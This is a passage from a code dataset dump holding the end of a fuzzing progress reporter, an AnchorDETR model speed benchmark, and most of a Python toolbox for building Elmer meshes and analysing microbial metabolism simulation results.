os._exit(2)
if is_fuzzing_still_in_progress(session):
plan_another_report(session, junit_logger, ConfigurationManager.get_reporting_interval())
message = create_report_message(session)
print(message)
else:
plan_another_report(session, junit_logger, DID_FUZZING_STARTED_CHECKS_TIME_INTERVAL_IN_SECONDS)
def plan_another_report(session, junit_logger, reporting_interval):
threading.Timer(reporting_interval, report_progress, [session, junit_logger]).start()
def did_fuzzing_already_started(session):
return session.total_num_mutations > 0
def is_fuzzing_hanged(session):
hanged = is_fuzzing_hanged.previous_mutant_index == session.total_mutant_index
is_fuzzing_hanged.previous_mutant_index = session.total_mutant_index
return hanged
is_fuzzing_hanged.previous_mutant_index = -1
def is_fuzzing_still_in_progress(session):
return session.total_num_mutations != session.total_mutant_index
def create_report_message(session):
percentage = session.total_mutant_index / session.total_num_mutations * 100
percentage = str(round(percentage, 2))
message = str(datetime.datetime.now()) + ": "
message += "Proceeded " + str(session.total_mutant_index) + " of "
message += str(session.total_num_mutations) + " (" + percentage + "%) test cases"
return message
def create_hanged_message(session):
test_case_number = str(session.total_mutant_index)
return "Fuzzing hangs on test case number: " + test_case_number + ". See log file for an error message."
| none | 1 | 2.280039 | 2 | |
compute_speeds.py | megvii-research/AnchorDETR | 160 | 6623867 | <reponame>megvii-research/AnchorDETR
# ------------------------------------------------------------------------
# Copyright (c) 2021 megvii-model. All Rights Reserved.
# ------------------------------------------------------------------------
# taken from https://gist.github.com/fmassa/c0fbb9fe7bf53b533b5cc241f5c8234c with a few modifications
# taken from detectron2 / fvcore with a few modifications
# https://github.com/facebookresearch/detectron2/blob/master/detectron2/utils/analysis.py
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import numpy as np
import tqdm
import torch
import time
from main import get_args_parser as get_main_args_parser
from models import build_model
from datasets import build_dataset
def warmup(model, inputs, N=10):
for i in range(N):
out = model(inputs)
torch.cuda.synchronize()
def measure_time(model, inputs, N=10):
warmup(model, inputs)
s = time.time()
for i in range(N):
out = model(inputs)
torch.cuda.synchronize()
t = (time.time() - s) / N
return t
def fmt_res(data):
return data.mean(), data.std(), data.min(), data.max()
def benchmark():
main_args = get_main_args_parser().parse_args()
dataset = build_dataset('val', main_args)
model, _, _ = build_model(main_args)
model.cuda()
model.eval()
images = []
for idx in range(100):
img, t = dataset[idx]
images.append(img)
with torch.no_grad():
tmp = []
for img in tqdm.tqdm(images):
inputs = [img.to('cuda')]
t = measure_time(model, inputs)
tmp.append(t)
res = {'time': fmt_res(np.array(tmp))}
return res
if __name__ == '__main__':
res = benchmark()
print(res)
| # ------------------------------------------------------------------------
# Copyright (c) 2021 megvii-model. All Rights Reserved.
# ------------------------------------------------------------------------
# taken from https://gist.github.com/fmassa/c0fbb9fe7bf53b533b5cc241f5c8234c with a few modifications
# taken from detectron2 / fvcore with a few modifications
# https://github.com/facebookresearch/detectron2/blob/master/detectron2/utils/analysis.py
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import numpy as np
import tqdm
import torch
import time
from main import get_args_parser as get_main_args_parser
from models import build_model
from datasets import build_dataset
def warmup(model, inputs, N=10):
for i in range(N):
out = model(inputs)
torch.cuda.synchronize()
def measure_time(model, inputs, N=10):
warmup(model, inputs)
s = time.time()
for i in range(N):
out = model(inputs)
torch.cuda.synchronize()
t = (time.time() - s) / N
return t
def fmt_res(data):
return data.mean(), data.std(), data.min(), data.max()
def benchmark():
main_args = get_main_args_parser().parse_args()
dataset = build_dataset('val', main_args)
model, _, _ = build_model(main_args)
model.cuda()
model.eval()
images = []
for idx in range(100):
img, t = dataset[idx]
images.append(img)
with torch.no_grad():
tmp = []
for img in tqdm.tqdm(images):
inputs = [img.to('cuda')]
t = measure_time(model, inputs)
tmp.append(t)
res = {'time': fmt_res(np.array(tmp))}
return res
if __name__ == '__main__':
res = benchmark()
print(res) | en | 0.622175 | # ------------------------------------------------------------------------ # Copyright (c) 2021 megvii-model. All Rights Reserved. # ------------------------------------------------------------------------ # taken from https://gist.github.com/fmassa/c0fbb9fe7bf53b533b5cc241f5c8234c with a few modifications # taken from detectron2 / fvcore with a few modifications # https://github.com/facebookresearch/detectron2/blob/master/detectron2/utils/analysis.py # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved | 2.282368 | 2 |
toolbox_elmer.py | roughhawkbit/robs-python-scripts | 0 | 6623868 | #/usr/bin/python
from __future__ import division
from __future__ import with_statement
import math
import matplotlib
from matplotlib import pyplot
from mpl_toolkits.axes_grid1 import make_axes_locatable
import numpy
from numpy import mean as amean
import os
import re
from scipy.spatial import Delaunay
from scipy.spatial import KDTree
from scipy.stats.mstats import gmean as gmean
from scipy.stats.mstats import hmean as hmean
import toolbox_basic
import toolbox_plotting
import toolbox_results_new as toolbox_results
import toolbox_schematic
import xml.etree.ElementTree as xmlTree
class Simulation:
def __init__(self, root_dir, find_protocol=True):
self.root_dir = toolbox_basic.check_path(root_dir)
if not find_protocol: return
# Set up the space from the protocol file.
protocol_path = toolbox_basic.find_protocol_file_path(self.root_dir)
self.protocol_tree = toolbox_basic.get_xml_tree(protocol_path)
space_params = self.protocol_tree.findall('./space/param')
for param in space_params:
name, text = param.attrib['name'], param.text
if name == 'wrapping': self.wrapping = (text == 'true')
elif name == 'length': self.side_length = int(float(text))
elif name == 'nDims': self.is_3d = (int(float(text)) == 3)
marks = self.protocol_tree.findall('./mark')
for mark in marks:
for param in mark:
if param.attrib['name'] == 'value':
value = int(param.text)
if param.attrib['name'] == 'number':
number = int(param.text)
if value == 2:
self.consumers = number
else:
self.producers = number
rs = self.protocol_tree.find("./process/param[@name='randomSeed']")
self.random_seed = int(rs.text)
def copy_mesh_files(self, detail_level, sif_name):
self.get_detail_level_mesh_dir(detail_level)
run_dir = self.get_run_dir(detail_level, sif_name)
run_mesh_dir = os.path.join(run_dir, 'mesh')
toolbox_basic.copy_dir(self.detail_level_mesh_dir, run_mesh_dir)
def get_concn_array(self, detail_level, sif_name):
self.get_run_dir(detail_level, sif_name)
grid_length = detail_level * self.side_length
array_path = os.path.join(self.run_dir, 'concn_array')
if os.path.isfile(array_path):
concn_array = toolbox_basic.load_array(array_path)
else:
result_file_path = os.path.join(self.run_dir, 'case.result')
result_file_path = toolbox_basic.check_path(result_file_path)
# This isn't quite correct! Without wrapping, Elmer skips some nodes
num_nodes = (grid_length + 1)**2
array_shape = (grid_length + 1,)*2
with open(result_file_path, 'Ur') as f:
last_lines = f.readlines()[-num_nodes:]
concn_array = numpy.array([float(line) for line in last_lines])
concn_array = numpy.reshape(concn_array, array_shape)
toolbox_basic.save_array(concn_array, array_path)
return concn_array
def get_consume_produce_functions(self, detail_level, sif_name):
self.get_sif_file_path(detail_level, sif_name)
with open(self.sif_file_path) as f:
lines = f.readlines()
regex = re.compile('\$ function consume.*')
cons_line = [line for line in lines if re.match(regex, line)][0]
min_index = cons_line.index('min(0.0')
close_index = cons_line.index(') }')
consume_rate = 'def consume_rate(c):\n\treturn min(0.0, %s)' \
%(cons_line[min_index+8:close_index])
regex = re.compile('\$ function produce.*')
prod_line = [line for line in lines if re.match(regex, line)][0]
min_index = prod_line.index('max(0.0')
close_index = prod_line.index(') }')
produce_rate = 'def produce_rate(c):\n\treturn max(0.0, %s)' \
%(prod_line[min_index+8:close_index])
exec consume_rate
exec produce_rate
return consume_rate, produce_rate
def get_detail_level_dir(self, detail_level):
name = 'detail_level_%d'%(detail_level)
self.detail_level_dir = os.path.join(self.root_dir, name)
toolbox_basic.make_dir(self.detail_level_dir)
return self.detail_level_dir
def get_detail_level_mesh_dir(self, detail_level):
self.get_detail_level_dir(detail_level)
self.detail_level_mesh_dir = os.path.join(self.detail_level_dir, 'mesh')
toolbox_basic.make_dir(self.detail_level_mesh_dir)
return self.detail_level_mesh_dir
def get_detail_level_results(self, detail_level, read_only=False):
self.get_detail_level_dir(detail_level)
cells_path = os.path.join(self.detail_level_dir, 'cell_locations.xml')
cells_file = SimulationResultsFile(path=cells_path, read_only=read_only)
return cells_file
def get_combined_results(self, detail_level, sif_name):
dl_results = self.get_detail_level_results(detail_level, read_only=True)
run_results = self.get_run_results(detail_level, sif_name, read_only=True)
for e in run_results.events:
for o in dl_results.events:
if o.position() == e.position():
for attrib in o.vars.keys():
e.vars[attrib] = o.vars[attrib]
return run_results
def get_rate_array(self, detail_level, sif_name):
self.get_run_dir(detail_level, sif_name)
array_path = os.path.join(self.run_dir, 'rate_array')
if not os.path.isfile(array_path):
self.get_run_results(detail_level, sif_name)
return toolbox_basic.load_array(array_path)
def get_run_results(self, detail_level, sif_name, read_only=False):
self.get_run_dir(detail_level, sif_name)
rates_path = os.path.join(self.run_dir, 'cell_rates.xml')
rates_file = SimulationResultsFile(path=rates_path, read_only=read_only)
if rates_file.events == []:
grid_length = self.side_length * detail_level
rates_file = self.get_detail_level_results(detail_level)
rates_file.path = rates_path
rates_file.setup_ranges(grid_length, self.wrapping)
rate_array = numpy.zeros((grid_length,)*2, dtype=numpy.float)
concn_array = self.get_concn_array(detail_level, sif_name)
consume_rate, produce_rate = \
self.get_consume_produce_functions(detail_level, sif_name)
rates_file.calc_rates_from_concn_array(concn_array, consume_rate,
produce_rate, rate_array=rate_array)
array_path = os.path.join(self.run_dir, 'rate_array')
toolbox_basic.save_array(rate_array, array_path)
head = 'mark,x,y'
if self.is_3d: head += ',z'
head += ',rate,amean_surf_concn'
rates_file.set_event_list_header(head)
rates_file.set_concn_rate_results(concn_array, rate_array)
rates_file.write()
return rates_file
def get_run_dir(self, detail_level, sif_name):
self.get_detail_level_dir(detail_level)
self.run_dir = os.path.join(self.detail_level_dir, sif_name)
toolbox_basic.make_dir(self.run_dir)
return self.run_dir
def get_sif_file_path(self, detail_level, sif_name):
self.get_run_dir(detail_level, sif_name)
self.sif_file_path = os.path.join(self.run_dir, sif_name+'.sif')
return self.sif_file_path
def make_start_file(self, detail_level, sif_name):
self.get_run_dir(detail_level, sif_name)
file_path = os.path.join(self.run_dir, 'ELMERSOLVER_STARTINFO')
with open(file_path, 'w') as f:
f.write('''%s\n1''' %(sif_name+'.sif'))
def make_mesh_files(self, biomass_array, detail_level):
self.get_detail_level_mesh_dir(detail_level)
grid_length = self.side_length * detail_level
num_elements = (grid_length)**2
num_nodes = (grid_length+1)**2
### Make mesh.header
header_path = os.path.join(self.detail_level_mesh_dir, 'mesh.header')
# The 2 denotes dimensions, 202's are boundaries, 404's are elements.
with open(header_path, 'w') as f:
f.write('%d\t%d\t%d\t\n2\t\n202\t%d\t\n404\t%d\t\n\t'
%(num_nodes, num_elements, num_elements, num_elements, num_elements))
### Make mesh.nodes
text = ''
for i in range(num_nodes):
# Shouldn't this take account of detail_level?
(y, x) = divmod(i, (grid_length+1))
# Consider changing this line to
#text += '%d -1 %.1f %.1f 0.0\n' %(i+1, x, y)
text += str(i+1)+' -1 '+str(x)+' '+str(y)+' 0.0\n'
nodes_path = os.path.join(self.detail_level_mesh_dir, 'mesh.nodes')
with open(nodes_path, 'w') as f:
f.write(text)
### Make mesh.elements
text = ''
counter = 0
for (i, j), body in numpy.ndenumerate(biomass_array):
counter += 1
n1 = (j+1) + (i*(grid_length+1))
n2 = n1 + 1
n3 = n2 + (grid_length+1)
n4 = n3 - 1
text += '%d %d 404 %d %d %d %d \n' %(counter, body, n1, n2, n3, n4)
elements_path = os.path.join(self.detail_level_mesh_dir, 'mesh.elements')
with open(elements_path, 'w') as f:
f.write(text)
### Make mesh.boundary
text = ''
counter = 0
# Along the bottom of the array (x=max) from left (y=0) to right (y=max).
e_base = grid_length*(grid_length - 1) + 1
n_base = grid_length*(grid_length + 1) + 1
for i in range(grid_length):
counter += 1
element = e_base + i
node = n_base + i
text += '%d 1 %d 0 202 %d %d \n' %(counter, element, node, node+1)
# Down the left of the array (y=0), from top (x=0) to bottom (x=max).
n_base = grid_length + 1
for i in range(grid_length):
counter += 1
element = (i*grid_length) + 1
node = 1 + i*n_base
text += '%d 2 %d 0 202 %d %d \n' %(counter, element, node, node+n_base)
# Along the top of the array (x=0) from left (y=0) to right (y=max).
for i in range(grid_length):
counter += 1
text += '%d 3 %d 0 202 %d %d \n' %(counter, i+1, i+1, i+2)
# Down the left of the array (y=max), from top (x=0) to bottom (x=max).
n_base = grid_length + 1
for i in range(grid_length):
counter += 1
element = (i+1)*grid_length
node = (i+1)*n_base
text += '%d 4 %d 0 202 %d %d \n' %(counter, element, node+n_base, node)
boundary_path = os.path.join(self.detail_level_mesh_dir, 'mesh.boundary')
with open(boundary_path, 'w') as f:
f.write(text)
def set_up_population(self, detail_level):
grid_length = self.side_length * detail_level
cells_file = self.get_detail_level_results(detail_level)
# If cells_file.events is empty then the detail level directory has
# probably only just been created, and this file does not yet exist.
if cells_file.events == []:
cells_file.set_space_parameters(wrapping=self.wrapping,
is_3d=self.is_3d, side_length=self.side_length)
bio_array_path = os.path.join(self.detail_level_dir, 'bio_array')
self.bio_array = numpy.ones((grid_length,)*2, dtype=numpy.int)
last_path = os.path.join(self.root_dir, 'lastIter',
'event_location_last.xml')
last_file = SimulationResultsFile(path=last_path, read_only=True)
cells_file.copy_event_list(last_file)
cells_file.set_up_population(detail_level, grid_length,
self.wrapping, self.bio_array)
toolbox_basic.save_array(self.bio_array, bio_array_path)
self.make_mesh_files(self.bio_array, detail_level)
# Finally, update and save the 'cell_locations.xml' file.
head = 'mark,x,i_min,i_max,y,j_min,j_max'
if self.is_3d: head += ',z,k_min,k_max'
cells_file.set_event_list_header(head)
cells_file.write()
else:
cells_file.setup_ranges(grid_length, self.wrapping)
return cells_file
def calc_amean_surf_concn(self, concn_array):
for event in self.event_list:
event.calc_amean_surf_concn(concn_array)
def plot_concn_array(self, axis, detail_level, sif_name, set_as_white=None, plot_cs=True):
array = self.get_concn_array(detail_level, sif_name)
extent = [-0.5/detail_level, self.side_length + 0.5/detail_level]*2
bottom_red, top_red = 0.1, 0.7
bottom_green, top_green = 0.6, 0.0
bottom_blue, top_blue = 0.1, 0.5
mid_point = 0.5
if not set_as_white == None:
max_val, min_val = numpy.max(array), numpy.min(array)
up_diff, down_diff = max_val - set_as_white, set_as_white - min_val
max_diff, total_diff = max(up_diff, down_diff), max_val - min_val
up_rel_diff, down_rel_diff = up_diff/max_diff, down_diff/max_diff
mid_point = down_diff/total_diff
cdict = {'red': ((0, bottom_red, bottom_red),
(mid_point, 1, 1),
(1, top_red, top_red)),
'green': ((0, bottom_green, bottom_green),
(mid_point, 1, 1),
(1, top_green, top_green)),
'blue': ((0, bottom_blue, bottom_blue),
(mid_point, 1, 1),
(1, top_blue, top_blue))}
my_cmap = \
matplotlib.colors.LinearSegmentedColormap('my_cmap', cdict, 255)
cs = axis.imshow(array, interpolation='nearest', origin='lower',
extent=extent, cmap=my_cmap)
axis.set_xlim(0.0, self.side_length), axis.set_ylim(0.0, self.side_length)
if plot_cs:
cbar = toolbox_plotting.make_colorbar(axis, cs, fontsize=8)
return cbar
else:
return cs
def plot_rate_array(self, axis, detail_level, sif_name):
array = self.get_rate_array(detail_level, sif_name)
extent = [0.0, self.side_length]*2
max_val = numpy.max(abs(array))
cdict = {'red': ((0, 0, 0), (0.5, 1, 1), (1, 1, 1)),
'green': ((0, 0, 0), (0.5, 1, 1), (1, 0, 0)),
'blue': ((0, 1, 1), (0.5, 1, 1), (1, 0, 0))}
cmap = matplotlib.colors.LinearSegmentedColormap('cmap', cdict, 255)
cs = axis.imshow(array, interpolation='nearest', extent=extent,
origin='lower', cmap=cmap)
cs.set_clim(-max_val, max_val)
axis.set_xlim(0.0, self.side_length)
axis.set_ylim(0.0, self.side_length)
toolbox_plotting.make_colorbar(axis, cs)
def plot_population(self, axis, detail_level, sif_name):
array = numpy.sign(self.get_rate_array(detail_level, sif_name))
extent = [0.0, self.side_length]*2
cdict = {'red': ((0, 0, 0), (0.5, 1, 1), (1, 1, 1)),
'green': ((0, 0, 0), (0.5, 1, 1), (1, 0, 0)),
'blue': ((0, 1, 1), (0.5, 1, 1), (1, 0, 0))}
cmap = matplotlib.colors.LinearSegmentedColormap('cmap', cdict, 3)
cs = axis.imshow(array, interpolation='nearest', extent=extent,
origin='lower', cmap=cmap)
cs.set_clim(-1.0, 1.0)
axis.set_xlim(0.0, self.side_length)
axis.set_ylim(0.0, self.side_length)
def calc_nearest_neighbor_distances(self, detail_level):
rf = self.get_detail_level_results(detail_level)
if rf.is_event_list_column_name('eNN_dist') and \
rf.is_event_list_column_name('eNN_dist') and \
rf.is_event_list_column_name('eNN_dist'):
return rf
cons_points = numpy.array([e.position() for e in rf.consumers()])
prod_points = numpy.array([e.position() for e in rf.producers()])
if self.wrapping:
cons_points = wrap_points(cons_points, self.side_length, is_3d=self.is_3d)
prod_points = wrap_points(prod_points, self.side_length, is_3d=self.is_3d)
cons_tree = KDTree(cons_points)
prod_tree = KDTree(prod_points)
for e in rf.events:
c_dist = cons_tree.query(e.position(), k=2)[0]
p_dist= prod_tree.query(e.position(), k=2)[0]
if (e.vars['mark'] == 2):
e.vars['sNN_dist'] = c_dist[1]
e.vars['oNN_dist'] = p_dist[0]
else:
e.vars['sNN_dist'] = p_dist[1]
e.vars['oNN_dist'] = c_dist[0]
e.vars['eNN_dist'] = min(e.vars['sNN_dist'], e.vars['oNN_dist'])
rf.add_event_list_column_name('eNN_dist')
rf.add_event_list_column_name('oNN_dist')
rf.add_event_list_column_name('sNN_dist')
#rf.eventList.update_text()
rf.write()
return rf
def get_mean_NN_dist(self, detail_level, mean='amean', dist='oNN_dist'):
rf = self.calc_nearest_neighbor_distances(detail_level)
dists = [e.vars[dist] for e in rf.events]
if not mean in ['amean', 'gmean', 'hmean']:
toolbox_basic.error_message('toolbix_elmer.Simulation.get_mean_NN_dist()',
'mean not recognised: %s'%(mean))
exec 'def mean(x): return %s(x)'%(mean)
return mean(dists)
def scatter_oNN_dist_vs_rate(self, axis, detail_level, sif_name, markersize=5):
rf = self.get_combined_results(detail_level, sif_name)
cons_rates = [-e.vars['rate'] for e in rf.consumers()]
cons_dists = [e.vars['oNN_dist'] for e in rf.consumers()]
axis.plot(cons_dists, cons_rates, '.', color='blue', markersize=markersize)
prod_rates = [e.vars['rate'] for e in rf.producers()]
prod_dists = [e.vars['oNN_dist'] for e in rf.producers()]
axis.plot(prod_dists, prod_rates, '.', color='red', markersize=markersize)
axis.set_xlabel(r'Interspecies N-N distance ($\mu$m)')
axis.set_ylabel('Abs. metabolic rate '+r'(zmol $cell^{-1} ms^{-1}$)')
axis.set_xlim(1, axis.get_xlim()[1])
def scatter_oNN_dist_vs_concn(self, axis, detail_level, sif_name, markersize=5):
rf = self.get_combined_results(detail_level, sif_name)
cons_concns = [e.vars['amean_surf_concn'] for e in rf.consumers()]
cons_dists = [e.vars['oNN_dist'] for e in rf.consumers()]
axis.plot(cons_dists, cons_concns, '.', color='blue', markersize=markersize)
prod_concns = [e.vars['amean_surf_concn'] for e in rf.producers()]
prod_dists = [e.vars['oNN_dist'] for e in rf.producers()]
axis.plot(prod_dists, prod_concns, '.', color='red', markersize=markersize)
axis.set_xlabel('Interspecies nearest neighbour distance')
axis.set_ylabel('Surface concentration')
axis.set_xlim(1, axis.get_xlim()[1])
def plot_kinetics(self, axis, detail_level, sif_name, maxs):
consume_rate, produce_rate = \
self.get_consume_produce_functions(detail_level, sif_name)
p = list(numpy.linspace(0, maxs, num=1000))
prod = [produce_rate(pval) for pval in p]
cons = [-consume_rate(pval) for pval in p]
axis.plot(p, prod, 'r-')
axis.plot(p, cons, 'b-')
#axis.set_xlabel(r'Product concentration ($\mu$M)')
axis.set_xlabel(r'Hydrogen concentration ($\mu$M)')
axis.set_ylabel('Metabolic rate '+r'(zmol $cell^{-1} ms^{-1}$)')
def make_run_plot(self, detail_level, sif_name, maxP=None):
fig = toolbox_plotting.ThesisFigure(double_column=True)
axis = fig.add_subplot('A', 221)
#self.plot_rate_array(axis, detail_level, sif_name)
self.plot_population(axis, detail_level, sif_name)
toolbox_plotting.empty_padding_axis(axis, "bottom")
axis = fig.add_subplot('B', 222)
toolbox_plotting.empty_padding_axis(axis, "bottom")
if maxP == None:
maxP = numpy.max(self.get_concn_array(detail_level, sif_name))
maxP = 10**math.ceil(math.log10(maxP))
self.plot_kinetics(axis, detail_level, sif_name, maxP)
axis.text(8, 0.2, r'$q_{A}([H])$', color='r', va='center', ha='center')
axis.text(8, 0.8, r'$-q_{B}([H])$', color='b', va='center', ha='center')
analytic = AnalyticApproach()
analytic.set_parameters(A=1, qmaxA=1, pmax=10, kA=10, qmaxB=5, pmin=0.04, kB=30)
p_equal = analytic.calc_equal_concn()
r_equal = analytic.production(p_equal)
axis.plot([p_equal]*2, [0,r_equal+0.05],
color='0.5', linestyle='-', zorder=-10)
axis.text(p_equal, r_equal+0.05, '%.2f'%(p_equal),
color='0.5', va='bottom', ha='center', fontsize=8)
axis.plot([0, p_equal+0.5], [r_equal]*2,
color='0.5', linestyle='-', zorder=-10)
axis.text(p_equal+0.6, r_equal, '%.2f'%(r_equal),
color='0.5', va='center', ha='left', fontsize=8)
axis = fig.add_subplot('C', 223)
cs = self.plot_concn_array(axis, detail_level, sif_name, plot_cs=False)
cbar = toolbox_plotting.make_colorbar(axis, cs, side="bottom")
#label = r'Product concentration ($\mu$M)'
label = r'Hydrogen concentration ($\mu$M)'
cbar.set_ticks([2.0, 2.1, 2.2, 2.3, 2.4, 2.5, 2.6, 2.7])
cbar.set_label(label)
axis.set_xticklabels(['']*10)
axis = fig.add_subplot('D', 224)
toolbox_plotting.empty_padding_axis(axis, "bottom")
self.calc_nearest_neighbor_distances(detail_level)
self.scatter_oNN_dist_vs_rate(axis, detail_level, sif_name)
fig.subplots_adjust(left=0.05, right=0.98, bottom=0.08, top=0.96,
wspace=0.3, hspace=0.25)
fig.process_subplots(label_pos=(0.0, 1.1))
axis = fig.find_axis_from_label('C')
axis.tick_params(bottom="off")
fig.save(os.path.join(self.get_run_dir(detail_level, sif_name), 'run_plot.pdf'))
def check_runs(self, rel_tol=1E-3):
for dl_dir in toolbox_basic.subdir_list(self.root_dir, 'detail_level_*'):
run_dirs = toolbox_basic.subdir_list(dl_dir)
for run_dir in run_dirs:
if os.path.basename(run_dir) == 'mesh':
continue
cell_file = os.path.join(run_dir, 'cell_rates.xml')
if os.path.isfile(cell_file):
cell_file = SimulationResultsFile(path=cell_file, read_only=True)
rel_diff = cell_file.get_relative_difference()
if rel_diff > rel_tol:
print('%s has rel_diff = %f'%(run_dir, rel_diff))
else:
print('%s has no cell_rates.xml file'%(run_dir))
def get_amean_concn(self, detail_level, sif_name):
rf = self.get_run_results(detail_level, sif_name, read_only=True)
return rf.get_amean_concn()
def get_mean_surf_concn(self, detail_level, sif_name,
cell_type='all', mean='amean'):
rf = self.get_run_results(detail_level, sif_name, read_only=True)
out = rf.get_mean_surf_concn(cell_type=cell_type, mean=mean)
return out
def get_sif_names(self, detail_level):
dl_dir = self.get_detail_level_dir(detail_level)
out = []
for subdir in toolbox_basic.subdir_list(dl_dir):
base_name = os.path.basename(subdir)
sif_path = os.path.join(subdir, base_name+'.sif')
if os.path.exists(sif_path):
out.append(base_name)
return out
class SimulationResultsFile(toolbox_results.ResultXMLfile):
def __init__(self, path=None, read_only=False, header='mark,x,y'):
toolbox_results.ResultXMLfile.__init__(self, path=path,
root_name='elmer', read_only=read_only)
self.simulation_root = self.find('./simulation')
if self.simulation_root == None:
self.simulation_root = xmlTree.SubElement(self.root, 'simulation')
self.eventList = self.get_subresult('./eventList')
if self.eventList == None:
self.eventList = toolbox_result.ResultXMLfile(root_name='eventList')
self.append_subresult(self.eventList)
self.events = self.eventList.read_in_text()
for line in self.events:
line.__class__ = EventResult
def get_event_list_column_names(self):
return self.eventList.header.split(',')
def set_space_parameters(self, wrapping=None, is_3d=None, side_length=None):
space = self.find('./simulation/space')
if space == None:
sim = self.find('./simulation')
space = xmlTree.SubElement(sim, 'space')
if not wrapping == None: space.set('wrapping', str(wrapping))
if not is_3d == None: space.set('is_3d', str(is_3d))
if not side_length == None: space.set('side_length', str(side_length))
def copy_event_list(self, simulation_results_file):
self.remove_subresult(self.eventList)
self.append_subresult(simulation_results_file.eventList)
self.eventList = simulation_results_file.eventList
self.events = simulation_results_file.events
def set_event_list_header(self, header):
self.eventList.header = header
self.eventList.root.set('header', header)
def add_event_list_column_name(self, column_name):
if self.is_event_list_column_name(column_name): return
self.eventList.add_column_name(column_name)
def is_event_list_column_name(self, column_name):
return (column_name in self.get_event_list_column_names())
def set_up_population(self, detail_level, grid_length, wrapping, bio_array):
for event in self.events:
event.apply_detail_level(detail_level)
event.setup_ranges(grid_length, wrapping)
event.stamp_bio_array(bio_array)
def apply_detail_level(self, detail_level):
for event in self.events:
event.apply_detail_level(detail_level)
def setup_ranges(self, grid_length, wrapping):
for event in self.events:
event.setup_ranges(grid_length, wrapping)
def stamp_bio_array(self, bio_array):
for event in self.events:
event.stamp_bio_array(bio_array)
def consumers(self):
return [e for e in self.events if e.vars['mark'] == 2]
def producers(self):
return [e for e in self.events if e.vars['mark'] == 3]
def calc_rates_from_concn_array(self, concn_array, consume_rate,
produce_rate, rate_array=None):
for event in self.events:
event.calc_rate_from_concn_array(concn_array, consume_rate,
produce_rate, rate_array=rate_array)
event.calc_amean_surf_concn(concn_array)
def set_concn_rate_results(self, concn_array, rate_array):
# This doesn't take account of detail_level!
# See update_concn_rate_results()
calculated_flux = \
numpy.sum(numpy.absolute(rate_array))/2
rel_diff = abs(numpy.sum(rate_array))/calculated_flux
max_concn = numpy.max(concn_array)
amean_concn = amean(concn_array)
min_concn = numpy.min(concn_array)
concn_rate = self.find('./simulation/concn_rate')
if concn_rate == None:
sim = self.find('./simulation')
concn_rate = xmlTree.SubElement(sim, 'concn_rate')
concn_rate.set('calculated_flux', str(calculated_flux))
concn_rate.set('rel_diff', str(rel_diff))
concn_rate.set('max_concn', str(max_concn))
concn_rate.set('amean_concn', str(amean_concn))
concn_rate.set('min_concn', str(min_concn))
def update_concn_rate_results(self, detail_level):
# This is a bit of a fudge: set_concn_rate_results() implicitly assumes
# detail_level = 1
production = numpy.sum([e.vars['rate'] for e in self.producers()])
consumption = numpy.sum([e.vars['rate'] for e in self.consumers()])
calculated_flux = (production - consumption)/2
rel_diff = abs(production + consumption)/calculated_flux
concn_rate = self.find('./simulation/concn_rate')
concn_rate.set('calculated_flux', str(calculated_flux))
concn_rate.set('rel_diff', str(rel_diff))
def get_amean_concn(self):
return float(self.find('.simulation/concn_rate').attrib['amean_concn'])
def get_calculated_flux(self):
return float(self.find('.simulation/concn_rate').attrib['calculated_flux'])
def get_relative_difference(self):
return float(self.find('.simulation/concn_rate').attrib['rel_diff'])
def get_mean_surf_concn(self, cell_type='all', mean='amean'):
if cell_type == 'all':
events = self.events
elif cell_type == 'consumers':
events = self.consumers()
elif cell_type == 'producers':
events = self.producers()
if not mean in ['amean', 'gmean', 'hmean']:
toolbox_basic.error_message('toolbix_elmer.Simulation.get_mean_NN_dist()',
'mean not recognised: %s'%(mean))
exec 'def mean(x): return %s(x)'%(mean)
return mean([e.vars['amean_surf_concn'] for e in events])
class EventResult(toolbox_results.SingleCSVline):
def __init__(self, header, text):
toolbox_results.SingleCSVline.__init__(self, header, text)
def apply_detail_level(self, detail_level):
# If detail_level is odd:
if (detail_level%2 == 1):
diff = int((detail_level-1)/2)
i_cen = int(self.vars['x'] * detail_level)
self.vars['x'] = (i_cen+0.5)/detail_level
self.vars['i_min'] = i_cen - diff
self.vars['i_max'] = i_cen + diff + 1
j_cen = int(self.vars['y'] * detail_level)
self.vars['y'] = (j_cen+0.5)/detail_level
self.vars['j_min'] = j_cen - diff
self.vars['j_max'] = j_cen + diff + 1
if 'z' in self.vars.keys():
k_cen = int(self.vars['z'] * detail_level)
self.vars['z'] = (k_cen+0.5)/detail_level
self.vars['k_min'] = k_cen - diff
self.vars['k_max'] = k_cen + diff + 1
# If detail_level is even:
else:
diff = int(detail_level/2)
i_cen = int(round(self.vars['x'] * detail_level))
self.vars['x'] = i_cen/detail_level
self.vars['i_min'] = i_cen - diff
self.vars['i_max'] = i_cen + diff
j_cen = int(round(self.vars['y'] * detail_level))
self.vars['y'] = j_cen/detail_level
self.vars['j_min'] = j_cen - diff
self.vars['j_max'] = j_cen + diff
if 'z' in self.vars.keys():
k_cen = int(round(self.vars['z'] * detail_level))
self.vars['z'] = k_cen/detail_level
self.vars['k_min'] = k_cen - diff
self.vars['k_max'] = k_cen + diff
def setup_ranges(self, grid_length, wrapping):
# Take care of any edge effects:
i_range = range(self.vars['i_min'], self.vars['i_max'])
j_range = range(self.vars['j_min'], self.vars['j_max'])
if 'z' in self.vars.keys():
k_range = range(self.vars['k_min'], self.vars['k_max'])
if wrapping:
self.i_range = [i%grid_length for i in i_range]
self.j_range = [j%grid_length for j in j_range]
if 'z' in self.vars.keys():
self.k_range = [k%grid_length for k in k_range]
else:
self.i_range = [i for i in i_range if i >= 0 and i <= grid_length]
self.j_range = [j for j in j_range if j >= 0 and j <= grid_length]
if 'z' in self.vars.keys():
self.k_range = [k for k in k_range if k>=0 and k<=grid_length]
def stamp_bio_array(self, bio_array):
for i in self.i_range:
for j in self.j_range:
if 'z' in self.vars.keys():
for k in self.k_range:
bio_array[i][j][k] = self.vars['mark']
else:
bio_array[i][j] = self.vars['mark']
def calc_rate_from_concn_array(self, concn_array, consume_rate,
produce_rate, rate_array=None):
self.vars['rate'] = 0.0
if self.vars['mark'] == 2: kinetic_rate = consume_rate
else: kinetic_rate = produce_rate
counter = 0
for (i, j) in [(i, j) for i in self.i_range for j in self.j_range]:
concns = [concn_array[I][J] for I in [i, i+1] for J in [j, j+1]]
rates = [kinetic_rate(concn) for concn in concns]
mean_rate = numpy.mean(rates)
if not rate_array == None:
rate_array[i][j] = mean_rate
